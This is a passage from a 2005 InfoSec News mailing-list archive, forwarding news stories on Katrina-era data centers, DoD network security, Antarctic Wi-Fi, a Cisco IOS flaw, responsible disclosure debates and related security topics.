in New Orleans with the ability to communicate with the outside world. It's an advantage they are quick to put to use. DirectNIC's "crisis manager," Michael "Interdictor" Barnett, updates his Live Journal [3] continually with on-the-street reports. It may be the only blog currently both written and hosted inside New Orleans, and it's receiving nearly 3,000 visitors an hour. A webcam streams images from inside the data center, showing haggard but smiling employees. Voice-over-IP telephones let stranded workers make telephone calls even when the rest of the city's phone service is severely overloaded. A photo gallery [4] is filled with pictures uploaded by the dozen. "We are still up and running," says Zipa's data center manager Michael Brunson. "We have people on site and they are doing well. Even if they need a bath." The atmosphere is a strange mixture of corporate casual and martial discipline. Men in shorts and polo shirts form squads to patrol and secure the 27-story high-rise -- with no working elevators. Police and National Guard members, separated from their cohorts, are using the Zipa building as a staging point and shelter. For Barnett, an Army Special Forces veteran, it's about more than just protecting the companies' assets. "I love this city, even with all its faults.... We're going to do what we can to set it right," he said. Supplies are scarce. A trip onto the streets of New Orleans to rescue a customer's server was also a chance to scavenge 25 gallons of potable water and some cleaning supplies (with the blessing of the owner, who had just hired the company to go rescue his computer). Employees stay primarily in the server room itself, enjoying the pleasures of the air conditioning necessary to keep the servers cool. Those servers host hundreds of thousands of websites and online forums, including dyspeptic internet community Something Awful [5]. Something Awful's founder, Rich Kyanka, is taking the potential loss of service in stride. "Our last-ditch plan is to change the forums into a podcast, then send RSS feeds into the blogosphere so our users can further debate the legality of mashups amongst this month's 20 'sexiest' gadgets." Kyanka hasn't yet been contacted by Zipa with contingency plans. "As long as the servers stay up, they can stay out of contact for as long as they like," he said. But no amount of tenacity will keep Zipa's diesel generator fueled. While currently operating at less than 20 percent of its full capacity, the generator can't run forever. "We should be able to stay up a few more days with what we have in-house," said Brunson. A fuel drop on Wednesday had to be abandoned because they weren't ready with fuel drums, according to Barnett's blog. -=- [1] http://zipa.com/ [2] http://www.directnic.com/ [3] http://mgno.com/ [4] http://sigmund.biz/kat/index.html [5] http://somethingawful.com/ From isn at c4i.org Thu Sep 8 02:36:26 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 8 02:42:42 2005 Subject: [ISN] DOD's 'Manhattan Project' Message-ID: Forwarded from: matthew patton > Unless DOD changes how it operates and learns to defend its cyber > networks, many military experts say it will not be able to wage an > effective battle in the cyberwar that is emerging as the 21st > century's biggest challenge. I don't go much for this bit about cyberwar this and that. Bombs, guns and boots on the ground is what ultimately matters. But if an adversary can jam and interfere with communications, then yes it affects the delivery of the above. I do think DoD has to take a look at their comm systems and their comm demands and figure out if the equipment they have or intend to rely upon, will be available when push comes to shove. Frequency hopping and line encryption is no longer the exlusive domain of tier-1 militaries. But I'm sure people far smarter than me have looked into that by now. > The Pentagon is at a crossroads, said Air Force Lt. Gen. Charles > Croom, the new director of the Defense Information Systems Agency > and commander of the Joint Task Force for Global Network Operations > (JTF-GNO). "Networks are too important to the warfighter to not have > them when the warfight begins," he said. So does this mean DoD/OSD firewalls are going to change to deny everything and then explicitly allow, and be VERY careful and deliberate about what they allow? The Pentagon's primary problem is pandering - pandering to senior officers and officials. How many E3's let alone junior officers and contractors who are theoretically following or at least trying to follow STIGs are going to refuse to back down when the O6 or UnderSecretary is bellowing that "by god I will have my fill_in_the_blank"? Something as mindless as forcing the screen to lock out after 10/15min of inactivity can nearly cause a revolt. Where are the senior managers who instead of signing some lame waver throw the people out of their office and tell them in no uncertain terms to figure out how to do something in a secure fashion? If the proper and secure solution is not convenient, then it's just too damn bad. Do it the right way or don't do it at all. No more of this tolerating substandard contractors and staff alike who refuse to spend any effort on doing things the secure way. It's not good enough to have a 'firewall' and then continue to be just as sloppy on the inside. The military is used to operating in top-down mode. So how come there isn't a IAP-wide ban on telnet, cleartext ftp, RPC, NFS etc? Everything that is not designed or implemented correctly gets turned off. Period. No exceptions. Sure there will be a lot of silly screaming and temper tamptrums, but the SecDEF on down need to get the message that sloppiness impacts the mission and costs lives. If a content creator can't upload to the web staging server because the "no clear ftp" rule is in effect, it's not time to browbeat or sidestep the policy, but rather time to get jumping ugly with the sysadmins who host the web content server to get their act together already. If the 'brass' won't even play by the rules and lay a heavy hand on their staff who don't want to either, then the General is wasting his breath. (Un)fortunately this is not just a problem in the military. Plenty of Fortune 100's on down who have legal, regulatory, and business critical justifications to clean up their act, are no more interested in fixing their messes either. > Croom said DOD approaches computer network defense by emphasizing > convenience to users, but the department's future information > assurance strategy should tilt toward adding security. I'd frankly settle for competence on the part of system admins instead of what we have now which is lazyness, lack of basic skills and knowledge, and an attitude of security doesn't matter. Security is hard and inconvenient. And since it is, they don't want to do it. Those organizations that have staffers who care, routinely cut themselves off from the rest of the Pentagon and take matters into their own hands. Part of the justification is defense-in-depth. But a big reason is that Pentagon/DoD network security simply can't be relied upon. I don't care if the other 30,000 computers in the building are owned by the military, they have no business being able to see or connect to my machines and neither do my machines have any business messing with anybody else. It is up to me to protect my users, and to protect the rest of the world *from* my users. That is my job. Few of my peers see it that way though. > "The threat is great," Croom said. "It requires constant vigilance." well, how "great" does it have to get before the boot comes stamping down hard on 20 years of institutionalized carelessness? Organizations hate to change. Do we have to blow up the building a second time? Who's going to put the screws to the service CIO's and bring them to account? Who will in turn roll that snowball down the hill? DoD had a decent rating/tracking system for patch management and if an organization failed to keep abreast, it was plain to see. Granted it worked on the honor system and public humiliation, but why not put some real teeth in it and tie salaries to network security metrics? If say the OSD CIO was forced to take an 50% pay cut, and the rest of the managers on down the line, I think we'd find some boots firmly planted in some butts. All of a sudden, all those excuses why security couldn't be done or why NT4 can't be turned off would evaporate like the morning mist. DITSCAP and other accredidation initiatives were a good idea. But what is useful about documenting the often glaring security deficiencies (assuming they were even recognized and identified as such) and getting somebody who won't be held accountable to sign off on them? Why aren't organizations forced to go back and FIX the problems? > DOD turned to procurement to support these policies and develop new > kinds of defenses for cyberattacks. First, the department chose > Retina from eEye Digital Security to scan computers for > vulnerabilities. Then, DOD selected Hercules from Citadel to patch > computers. Next, the department built a new multimillion-dollar > command center to monitor global network operations and picked > PestPatrol, antispyware from Computer Associates International. DOD > will soon begin testing Pest Patrol before introducing it later in > the year. This technology is all fine and good. But Security is not a technology problem. It's a people problem. No amount of Hercules/PestPatrol/NortonAV is going to fix, fundamental network engineering mistakes. The services don't necessarily have a massive patch management problem (though there are some that need motivating), they have a network architecture and mindset problem. I've got an Nokia IPSO sitting on a rack. It's been there for 3 years. OSD tossed it at us and I guess figured we'd do something with it. Well, it's been acting as a doorstop and dust collector all this time. Nobody here knew what to do with it or had the necessary motivation (personal or organizational) to figure it out and engineer the network to make use of it. Within hours of arrving and being informed of my mission I asked where our firewall was and discovered our all too typical state. > "This is the equivalent of the Manhattan Project," Lentz said. "I > will say we are at that level of seriousness of securing this > massive network." > > Every four hours, he said, the equivalent of the entire Library of > Congress' archives travels on DOD networks. To wage network-centric > warfare, he said, the department's 4 million users must trust the > confidentiality of the information that crosses GIG and be assured > of its availability. The amount of packets or the number of interconnects is not important. Security done right all the way to the lowest levels makes a large, complex problem quite manageable. And that is where most organizations (incl the gov't) fall flat on their face. When the department doesn't bother to practice good security, then it makes the division's job considerably more difficult. It's up to the division to cut the department off until they get their act straight. And on up the food chain. But if there are no marching orders and feet held to real fires, then nobody has incentive to put the screws hard to the people under their command. In the Army, god help the Lt. who has a member of his squad lose a case of ammo on an exercise. Is doing computer security that unimportant? > "The risk of losing the engagement because the systems were hacked > grows explosively," Paller said. President Bush has pledged to > defend Taiwan if China attacks. And DOD has said the new local > warfighting strategy of China's People's Liberation Army is to use > computer network operations to seize the initiative and gain > electromagnetic dominance early. I can appreciate the vital significance of communications and data feeds in dealing with the fog of war. But we have mobile comm groups for a reason. Yes, it would be inconvenient not to be able to use the Taiwan phone system to interconnect battalians in the field with tactical HQ. But something tells me the Chinese will 'win' in Taiwan and it has nothing to do with their h4x0r skills or Taiwan's lackadaisical attitude toward infrastructure security. Then again is it Taiwan's fault or more the telco provider itself who could care less about the security of the product (hardware and especially software) it sells? Homeland Security has been beating their drum for a while now. Look what Cisco pulled at BlackHat. If we're all in this together, how come commercial entities continue to downplay their "social obligations"? This latest worm knocked out what, several banks, an auto plant and probably lots of other lesser targets. I'll bet some pointed questions have been asked by now. But did anybody learn a lesson? Or are we just doomed to repeat the same idiocy the next time around? From isn at c4i.org Thu Sep 8 02:36:48 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 8 02:42:58 2005 Subject: [ISN] Running Wi-Fi in the coldest, driest and windiest place on Earth Message-ID: http://www.tomshardware.com/hardnews/20050901_172053.html By Humphrey Cheung September 1, 2005 Westlake Village (CA) - If you think setting up a wireless network is difficult in your living room, try the Antarctic. For the last seven years scientists in Antarctica have been setting up access points and repeaters in sub-zero temperatures and 80 mile per hour winds. To the hundreds of scientists stationed there, wireless gives a big morale boost and increases their efficiency. Kent Colby, Senior Communications Tech with the National Science Foundation, told us what it is like to be the "Wi-Fi guy" down south. Wireless access points and repeaters, often placed on mountain tops, shuttle information between science camps, towns and ports. A wireless network provides scientists a valuable and often the only available infrastructure for transmitting the enormous amount of digital data from collection points to home base. While Wi-Fi has increased bandwidth between residents and stations in Antarctica, traffic heading from the world's second smallest continent is very limited. With only 10 phone lines and a single T1 coming off the continent strict procedures are in place to ration outside access. There is a coffee shop where scientists can grab a hot drink and plug in their laptops, but around town options are scarce. "The T1 is shared with NASA so really we have only 180K for Internet. You can't use wireless around town because it chokes the bandwidth," says Colby. Personnel must brave the elements to get to Wi-Fi installation sites, often on mountain tops. Temperatures usually hovers around -5 to -31 degress Fahrenheit in the summer, but have dipped to an incredible -129 degrees Fahrenheit, according to Colby. In addition, 100 mile per hour winds are sustained for several hours and Colby remembers when they had 80 mile per hour winds winds for two and a half days straight. "The wind can blow doors off and collapse a building," says Colby. Storms can trap Wi-Fi installers on a mountain top. Extreme winds of up to 200 mile per hour along with white-out conditions can make any type of rescue impossible. Colby says that most sites have pre-positioned supplies and that personal can survive several days before getting help. The wireless access points and repeaters are also subjected to extreme conditions. "If a manufacturer says their access point is rated for up to -20 degrees, we say that we need it to be -40," says Colby. Once the access point is turned on it stays on for the whole summer, thanks to solar panels and backup batteries. Perhaps the cold temperature also improves stability because, according to Colby, they have had only three weather related equipment failures over the years. So why would anyone need Wi-Fi in the Antarctica wasteland? For residents it has proved to be a huge morale boost. Scientists can keep in touch with loved ones back home. Colby says that one school teacher was able to send almost daily pictures back to her class. In addition to the morale boost, the wireless network has other tangible and perhaps lifesaving benefits. Scientific data can now be relayed with a simple email from a laptop. Before Wi-Fi, radio channels would be tied up as information was read. "You don't have to read the data and keep saying roger," says Colby. The wireless network has brought some extra headaches to network administrators. Scientists have brought subnets down with their personally installed access points. Improperly configured IP addresses have caused packet storms making Colby's life difficult. How does the IT team prevent such disasters? "We go wardriving," says Colby. Running AirMagnet on his laptop, Colby trudges around town looking for rogue access points. Colby says, "I find a lot of Linksys and Netgear here and there." He also has found scientific data on shared folders. While some networks are secured, most are not and Colby isn't overly concerned about intruders finding sensitive information. "If someone did hack in, they would find out that a certain moss grows at 1 mm a year, how thrilling is that?" From isn at c4i.org Thu Sep 8 02:35:22 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 8 02:43:17 2005 Subject: [ISN] The Four Most Common Security Dangers Message-ID: http://informationweek.com/story/showArticle.jhtml?articleID=170700829 By Matthew Friedman Networking Pipeline Sept. 6, 2005 For all the complexity of security, the most common security dangers are downright mundane. They're not due to the arcane arts of the most skilled hackers or some cunning exploit; they're out there in plain sight. "A successful attack depends on a combination of four things that don't have a lot to do with the attacker," says Forrester Research analyst Paul Stamp. "It's usually something like social engineering, a breakdown in process or the absence of process. It could have something to do with a simple technical vulnerability or insider abuse. But it's usually a combination of two or more of those four factors." The thing that should send chills up the spine of anyone who manages a network open to the Internet -- which is to say, virtually all networks -- is the fact that all of these vulnerabilities can be easily caught and fixed. Because they're so common, obvious, or at least mundane, however, they are often the last place you'll look for danger. Social Engineering: It's humbling to remember that superstar hacker Kevin Mitnick wasn't much of a code warrior. However, he was a first-rate social engineer who raised the "Hi, how are you, what's your password?" approach to network delinquency to the level of a black art. With the constant warnings about protecting passwords and not opening unsolicited attachments, you'd think that network users would be wise to what is, after all, the oldest trick in the hacker's book. But they aren't. Stamp says, "You'd be surprised how often social engineering succeeds." Just this summer, the British Department of Defence -- which should be on the list of people who should be wise to this -- was subjected to a targeted Trojan attack. "People were sent CDs with marketing material," Stamp says. "In fact, it installed a targeted Trojan that collected confidential information." The bottom line is that even smart people can be sucked-in by social engineering. The first step toward protection, Stamp says, is as basic as education. "It truly is a boring recommendation, but we have to educate users and back that up with action," he says. "The time has passed for us to tolerate fools. We have to be serious about this and take disciplinary action against people who don't do what they're supposed to do. The stakes are too high." Process Errors: It seems that there is always a technological fix for every security problem but that, in itself, is part of the problem, Stamp says. "We do a very good job of going out and looking at technical vulnerabilities," he says. "But people don't do a very good job of taking apart processes and seeing where those are vulnerable." It could be that the process has no oversight mechanism, or that someone has forgotten to check something that should have been checked out, but the results are the same: a lot can go wrong if you're not looking. Stamp points to the Choicepoint case earlier this year as a prime example of a breakdown in process. "Criminals were able to open fraudulent accounts with Choicepoint because the process for opening an account didn't involve checking to see if the client was a real company," he says. "It was as simple as that." Moreover, if companies are going to use technologies like networks, wireless and mobile devices, they have to have some way of dealing everything from absent-mindedness to incompetence and malice. Mistakes happen, of course, but they can turn into disasters if you don't respond to them effectively. "It could be something as simple as someone leaving a Blackberry in a cab," Stamp says. "Surprising few companies have policies for dealing with Blackberries when they're out of the office, and the whole point of a Blackberry is to be out of the office." Technical vulnerabilities: Enterprise networks, with their passels of routers, switches, access points and other kinds of hardware, are fundamentally complex organisms. And that's a problem. It's easy to keep a door locked when you only have one door, but add a few more, some windows and a skylight, and the security problem increases exponentially. With so many devices and connections to watch on a network, there are also so many opportunities to miss something. "Normally, at some point along the way, there's something that hasn't been patched, or something that hasn't been configured properly, and that leaves the whole network vulnerable," Stamp says. "Complexity is a big part of it. Complexity is the enemy of security, but the CIO's and CSO's job is complexity management." Inside Abuse: No one suspects family, but maybe they should. The Computer Security Institute-FBI computer crime survey has found every year for the last five years that at least half of all security breaches originate on the inside of the network. "Inside abuse is network security's dirty little secret," Stamp says. "We've been too trusting so far. It comes back to the reality that some people are being malevolent, and sometimes is accidental. But you need policies to stop the malevolent ones and minimize the accidents." Part of the problem is that no one wants to believe that one of their own could be the problem, and inside abuse is often swept under the carpet. But Stamp is adamant that just because you can't or chose not to see the problem doesn't mean it isn't there. At the end of the day, all of these common dangers can be dealt with, it only takes the will to clean up processes, patch systems, and make sure that users are doing what they're supposed to be doing. "It has to be both a change in attitude and the adoption of newer, smarter technologies," Stamp says. "That means designing the network to be secure from the ground up, and that includes the people as well as the technology." From isn at c4i.org Thu Sep 8 02:35:35 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 8 02:43:40 2005 Subject: [ISN] New Cisco flaw could pose threat to Net Message-ID: http://news.com.com/New+Cisco+flaw+could+pose+threat+to+Net/2100-1002_3-5853330.html By Joris Evers Staff Writer, CNET News.com September 7, 2005 A serious flaw in Cisco Systems software puts computer networks at risk of cyberattack and has prompted security vendor Symantec to raise its Internet threat level. A vulnerability in Cisco's Internetwork Operating System could be exploited to crash or remotely run malicious code on devices that run IOS, the San Jose, Calif., networking giant warned Wednesday in a security advisory. IOS runs on Cisco's routers and switches, which make up a large portion of the Internet's infrastructure. "Successful exploitation of the vulnerability on Cisco IOS may result in a reload of the device or execution of arbitrary code," Cisco said in its advisory. "Repeated exploitation could result in a sustained (denial of service) attack or execution of arbitrary code." Cisco's warning prompted Symantec to raise its ThreatCon global threat index to Level 2, which means an attack is expected. "Given the recent attention to exploitation of vulnerabilities in Cisco's IOS it is possible that this issue will see attempts at exploit development in the near term," Symantec said in an advisory. Symantec and Cisco both noted that there are no known exploits or attacks that take advantage of this latest IOS vulnerability. Cisco has software fixes available to correct the problem. Cisco has had a hot summer when it comes to security. During the Black Hat and Defcon security events in July, researcher Michael Lynn demonstrated he could gain control of a Cisco router by exploiting a known security flaw in IOS. The operating system had until then been perceived as impervious to such attacks. Previous Next Cisco and Internet Security Systems--Lynn's employer--had agreed to pull the presentation, but researcher Lynn quit his job and gave the talk anyway. Cisco and ISS sued Lynn after his presentation and hackers rallied behind the researcher. The vulnerability disclosed on Wednesday doesn't affect all versions of IOS, Cisco said. Furthermore, the vulnerability exists only if the Firewall Authentication Proxy for FTP and Telnet Sessions is in use, Cisco said. That component of IOS handles authentication requests for file transfer and telnet sessions. Affected are those devices running IOS versions 12.2ZH and 12.2ZL, 12.3, 12.3T, 12.4 and 12.4T, Cisco said. Users can log on to their Cisco device and enter the "show version" command to determine which version of IOS it is running, Cisco said. The company rates the issue as a "medium" urgency. Symantec advises users who can't install the patch immediately to disable the Firewall Authentication Proxy for FTP and Telnet Sessions or limit access to the service to trusted hosts and networks. From isn at c4i.org Thu Sep 8 02:37:20 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 8 02:47:07 2005 Subject: [ISN] Agencies' disaster recovery plans get a real-world test Message-ID: http://www.govexec.com/story_page.cfm?articleid=32162 By Karen Rutzick krutzick @ govexec.com September 7, 2005 A few months before Hurricane Katrina suspended government operations in New Orleans and brought tragedy to the Gulf Coast, the Office of Personnel Management asked agencies nationwide if they were prepared for a natural disaster. The answer, from the 85 agencies that responded to OPM's 2005 Emergency Preparedness Survey, was a resounding yes. All 15 cabinet-level departments responded to the survey as well as many smaller agencies, including the Nuclear Regulatory Commission, Small Business Administration and Federal Reserve Board. OPM said the results of the survey, conducted in April, "reflect very high levels of emergency preparedness." According to the agencies surveyed, they were ready to take care of their own in the event of a disaster, such as Katrina. The idea, according to OPM, was for agencies to "be able to maintain business continuity" and keep running the country, even during times of disaster. The survey's questions were based on the recommended minimum criteria agencies should meet for emergency preparedness. More than 90 percent of the agencies surveyed said their facilities had an up-to-date Occupant Emergency Plan. An OEP lays out agency guidelines in terms of designating emergency personnel, contingency work plans, evacuation procedures and more. More than 95 percent of agencies said their facilities had conducted evacuation drills in the past year. The same percentage said they had designated emergency personnel to serve as points of contact and leaders. The Agriculture Department's National Finance Center in New Orleans had put in place many emergency preparedness procedures for employees, according to spokesman Ed Loyd. The center had an OEP, had conducted evacuation drills at the facility, had distributed emergency guides to employees and had a contingency work plan in place before the hurricane hit, he said. While the agencies that responded appeared to be highly prepared for immediate disaster response, such as keeping evacuation routes clearly marked, some of their longer-term emergency plans were weaker. As flooding keeps the city indefinitely closed, Hurricane Katrina highlights the need for long-term contingency plans. Additionally, the survey reported that of the participating agencies: * 57.6 percent had "prearranged agreements to transfer work to other agency locations;" * 63.5 percent had "telework capability in place from home or telecenter;" * 65.9 percent had "arrangements to temporarily conduct operations from other agency space;" * 75.3 percent had "plans to notify agency customers/clients of temporary alternative arrangements." The Interior Department's Minerals Management Service, which did not individually participate in OPM's survey (though Interior as a whole did), has several regional offices along the Gulf Coast. The MMS, according to spokesman Gary Strasburg, did have a contingency plan for long-term operations, which the agency's offices practiced every year. A continuity of operations plan team set up a contingency office in Houston, and was "transferring regional office operations and a limited number of staff" to the new location as a result of damage to offices from the hurricane. Strasburg said employees had practiced using the Houston location as an emergency center and actually went there and set it up every year. In 2004, OPM provided training to agency representatives on improving emergency preparedness. OPM said these sessions were meant to focus on emergency drills and the use of telework as areas in need of improvement. From isn at c4i.org Thu Sep 8 02:37:40 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 8 02:47:41 2005 Subject: [ISN] Ex-Student Sentenced in UT Computer Hacking Case Message-ID: http://www.woai.com/news/cyberstuff/story.aspx?content_id=E6CD0693-ED79-418F-B90D-0A8B149B5B35 9/7/2005 A former University of Texas at Austin student has been sentenced to five years of probation and ordered to pay more than $170,000 in restitution for hacking into the school's computer system and taking Social Security numbers and other personal information from tens of thousands of people. Christopher Andrew Phillips, 22, was also prohibited from accessing the Internet, except under approval and supervision from his probation officer and only for school or work, U.S. Attorney Johnny Sutton said in a news release Tuesday. "He found out the hard way that breaking into someone else's computer is not a joke," Sutton said in the release. A federal jury found him guilty in June of damaging the university's computer system and illegally possessing almost 40,000 Social Security numbers. The jury acquitted Phillips of the two most serious charges against him, rejecting prosecutors' claims that he intended to profit from the Social Security numbers and from the financial data of other people that was found on his computer in January 2003. From isn at c4i.org Thu Sep 8 02:38:02 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 8 02:48:16 2005 Subject: [ISN] Bug hunters, software firms in uneasy alliance Message-ID: http://news.zdnet.com/2100-1009_22-5846019.html By Joris Evers, and Marguerite Reardon, CNET News.com Published on ZDNet News: September 6, 2005 Tom Ferris is walking a fine line. He could be Microsoft's friend or foe. Ferris, an independent security researcher in Mission Viejo, Calif., found what he calls a serious vulnerability in Microsoft's Internet Explorer Web browser. He reported it to the software giant on Aug. 14 via the "secure@microsoft.com" e-mail address and has since exchanged several e-mail messages with a Microsoft researcher. Up to that point, Ferris did everything according to Microsoft's "responsible disclosure" guidelines, which call for bug hunters to delay the announcement of security holes until some time after the company has provided a fix. That way, people who use flawed products are protected from attack, the argument goes. Last weekend, however, Ferris came close to running afoul of those guidelines by posting a brief description of the bug on his Security Protocols Web site and talking to the media about the flaw. So far, the move has done little more than raise some eyebrows at Microsoft. "I am walking a fine line, but I am doing it very carefully because I am not disclosing actual vulnerability details," Ferris said. "I do this to inform users that flaws still do exist in IE...I don't like it that Microsoft tries to give users a nice warm feeling that they are disclosing everything researchers report to them." At issue is the push for "responsible disclosure" of software flaws by many industry players, including titans such as Microsoft, Oracle and Cisco Systems. Microsoft publicly chastises security researchers who don't follow its rules. Also, those researchers won't get credit for their flaw discovery in Microsoft's security bulletin, which is published when the company releases a patch. Because Ferris did not disclose any actual vulnerability details, he's still on Microsoft's good side, a company representative said. While many software makers promote responsible disclosure, it isn't universally backed by the security community. Critics say it could make security companies lazy in patching. Full disclosure of flaws is better, they say, and turns up the heat on software makers to protect their customers as soon as possible. How long is too long? "Microsoft obviously takes way too long to fix flaws," Ferris said. "All researchers should follow responsible disclosure guidelines, but if a vendor like Microsoft takes six months to a year to fix a flaw, a researcher has every right to release the details." By that time someone else, perhaps a malicious person, may also have found the same flaw and might be using it to attack users, Ferris said. Often lambasted for bugs in its products, Microsoft is doing its best to win the respect of the security community. The company has "community outreach experts" who travel the world to meet with security researchers, hosts parties at security events and plans to host twice-annual "Blue Hat" events with hackers on it its Redmond, Wash., campus. At Blue Hat, hackers are invited to Microsoft's headquarters to demonstrate flaws in Microsoft's product security. "Security researchers provide a valuable service to our customers in helping us to secure our products," said Stephen Toulouse, a program manager in Microsoft's security group. "We want to get face to face with them to talk about their views on security, our views on security, and see how best we can meet to protect customers." Many companies are getting better at dealing with security researchers, said Michael Sutton, director of iDefense Labs, which deals with researchers and software makers. "The environment has definitely changed from two or three years ago, though there are vendors who are going in the opposite direction," he said. While Microsoft sometimes is still referred to as the "evil empire," it appears to be successfully wooing security researchers. "We are at the point where all the obvious things we tell Microsoft to do, they already do it," Dan Kaminsky, a security researcher who participated in Microsoft's first Blue Hat event last March, has said. Balancing act Other technology companies still struggle with hacker community relations. Cisco especially has managed to alienate itself from the hacker community to the extent that T-shirts with anti-Cisco slogans were selling well at this year's Defcon event. Oracle also isn't a favorite, researchers said. Cisco, along with Internet Security Systems, last month sued security researcher Michael Lynn after he gave a presentation on hacking router software at the Black Hat security conference. The company had previously tried to stop Lynn from giving his talk in the first place. "It was definitely a surprise to see Cisco's reaction," iDefense's Sutton said. "I don't think that's the best approach. I do feel that it is happening less and that vendors are realizing that we don't want to work against them, but with them." Cisco contends it doesn't have any beef with Lynn's discoveries, but instead the company is unhappy about the way he went about distributing the information to the public. "This incident violated aspects of normal protocol for dealing with security flaws," said Bob Gleichauf, CTO for Cisco's Security Technology Group. "And we are real sticklers for protocol." But it seems that there have been several instances where Cisco has had similar problems in its dealings with researchers. Early in 2004, Paul Watson discovered a flaw in the TCP/IP protocol that could be exploited on a number of networking products, including Cisco's routers. Watson said he initially e-mailed two of Cisco's engineers, who responded promptly. They were helpful and even contributed some thoughts and ideas to his research, he said. But once the issue was identified as a serious security risk by the legal team at Cisco, the tone of the communication changed, Watson said. Cisco still wanted information from Watson, but no longer responded to his queries. Watson provided Cisco with several possible methods to correct the problem. Frustrated by the lack of communication with Cisco, Watson decided to present his research at the CanSecWest Security Conference in April 2004. In a scenario similar to that at Black Hat, Cisco and the U.S. Department of Homeland Security asked the conference organizer to pull the talk. The request was denied. The impending talk spurred the company into action. Fixes were released a few days before the conference. However, Cisco not only provided patches, it also patented a fix for the flaw. This raised fears that Cisco might charge for the fix, which also affected other vendors, although Cisco did not. "I was shocked," Watson said in an e-mail. "It really broke my trust in them." Cisco, like other software makers, wants security researchers to report flaws privately and have time to patch before disclosure, but Cisco took advantage of this period to apply for a patent, he said. Playing it smart A similar situation played out about a year later. Cisco tried to patent a fix to a flaw in the ICMP protocol that was discovered by Fernando Gont. The researcher outsmarted Cisco by documenting his discovery and the fix, and also by sharing the information privately with the open-source community and the Internet Engineering Task Force, a standards organization. Mary Ann Davidson, chief security officer at Oracle, sees security researchers who threaten vendors with disclosure of bugs as a problem, she wrote in a recent perspective piece on News.com. "The reality is that most vendors are trying to do better in vulnerability handling. Most don't need threats to do so," Davidson said. Alexander Kornbrust specializes in security of Oracle products. He went public with details on six security vulnerabilities in Oracle software in July, about two years after he reported the bugs to the software maker and fixes still had not been provided. Oracle chided Kornbrust as irresponsible for disclosing the data. Although not entirely happy about his dealings with Oracle, Kornbrust said it is not an adversarial relationship. "Hostile is not the right expression. I did get feedback from Oracle," Kornbrust said. But that was only immediately after he reported the bugs. Oracle did not give Kornbrust updates on how it was addressing the problems afterwards. "Oracle supports guidelines for responsible disclosure. One of those guidelines is that the company should send out updates to the researcher. They don't," said Kornbrust, who runs Germany's Red Database Security. In the past, many hackers and security researchers outed glitches without giving much thought to the impact the disclosures would have on Internet users. Software makers have been working to provide a channel for disclosure. Several have also established patching schedules. Microsoft releases patches every second Tuesday of the month, and Oracle has a quarterly schedule. Still, the debate on responsible disclosure rages. Recently the French Security Incident Response Team, or FrSIRT, was the subject of discussion on a popular security mailing list. FrSIRT, formerly known as K-Otic, releases details on vulnerabilities and also publishes exploit code that could help attackers. Sometimes the holes aren't yet patched. Other than FrSIRT selling its service, what good can such publishing do? critics have asked. "With our dependency on IT systems, responsible disclosure is of paramount importance," said Howard Schmidt, an independent security consultant who has served as cybersecurity adviser to the White House and security executive at Microsoft and eBay. Technology companies that are not responsive to security researchers do pose a problem, Schmidt said. He suggests that the government, specifically the US Computer Emergency Readiness Team (the Department of Homeland Security's Internet security agency), could act as an intermediary. "And then perhaps the government could put some pressure on (technology companies)," he said. From isn at c4i.org Thu Sep 8 02:38:19 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 8 02:48:45 2005 Subject: [ISN] eEye spots another gaping hole in Outlook and Explorer Message-ID: http://www.techworld.com/security/news/index.cfm?NewsID=4353 By Matthew Broersma Techworld 07 September 2005 Microsoft says it is investigating a new high-risk security flaw affecting Outlook and Internet Explorer, adding to the growing number of serious bugs that have been reported to the vendor but remain unfixed. eEye Digital Security disclosed the new bug, a buffer-overflow flaw potentially allowing attackers to execute malicious code on a system, last week. The bug affects default installations of Outlook, Outlook Express and Internet Explorer on Windows 2000 and Windows XP with Service Pack 1 installed, although eEye said additional versions of Windows may also be affected. Microsoft said it is investigating the problem, and may issue a fix in the future. The company said it isn't aware of any exploits using the flaw. In order to minimise the danger from unpatched bugs, eEye doesn't disclose more than the bare minimum of information on a flaw until it has been patched or the vendor has tested a workaround. However, the number of unpatched high-risk flaws eEye and other vendors have reported to Microsoft products is substantial, with some dating back several months. Security researchers usually urge vendors to patch flaws within a few weeks of the initial report, arguing that bugs can be detected by potential attackers just as easily as by legitimate researchers. eEye alone says it has nine bug reports awaiting patches from Microsoft, the oldest of which dates from the end of March. Most are high-risk, affecting software such as Internet Explorer, Outlook and system-level software. Software from Macromedia and RealNetworks also has a total of three unpatched, high-risk flaws, according to eEye. From isn at c4i.org Thu Sep 8 02:39:00 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 8 02:49:54 2005 Subject: [ISN] Security UPDATE -- A Peek into the Future of Wi-Fi Security -- September 7, 2005 Message-ID: ==================== This email newsletter comes to you free and is supported by the following advertisers, which offer products and services in which you might be interested. Please take a moment to visit these advertisers' Web sites and show your support for Security UPDATE. Download Free Patch & Spyware Management Software Now! http://list.windowsitpro.com/t?ctl=12DE3:4FB69 Gone in 30 Days: Exchange, Retention, and Regulatory Compliance http://list.windowsitpro.com/t?ctl=12DD1:4FB69 ==================== 1. In Focus: A Peek into the Future of Wi-Fi Security 2. Security News and Features - Recent Security Vulnerabilities - Another IE Flaw Surfaces - Long Registry Keys Can Help Hide Malware 3. Security Toolkit - Security Matters Blog - FAQ - Security Forum Featured Thread 4. New and Improved - Desktop Spyware Protection for SMBs ==================== ==== Sponsor: Shavlik Technologies==== Download Free Patch & Spyware Management Software Now! Is your network really secure? Take your automated network security to the next level with new Shavlik NetChk Protect - Patch & Spyware Management in one easy-to-use GUI. Shavlik NetChk Protect is an agentless solution that is designed for the enterprise and boasts fast, accurate detection/remediation and prevents spyware installation, maximizing your defense against such threats- Remediate Spyware and Install Patches in 30 minutes or Less with Shavlik NetChk Protect for a Complete Security Solution. To download free software visit: http://list.windowsitpro.com/t?ctl=12DE3:4FB69 ==================== ==== 1. In Focus: A Peek into the Future of Wi-Fi Security ==== by Mark Joseph Edwards, News Editor, mark at ntsecurity / net Today, Wi-Fi networks are secured by using a number of methods. Those methods protect Access Points (APs) and clients from a wide variety of attacks: connection hijacking, unauthorized connections to legitimate APs, Denial of Service (DoS) attacks, address spoofing, attempts at network bridging, rogue APs, man-in-the-middle attacks, and the list goes on. Any sort of wireless communication is more 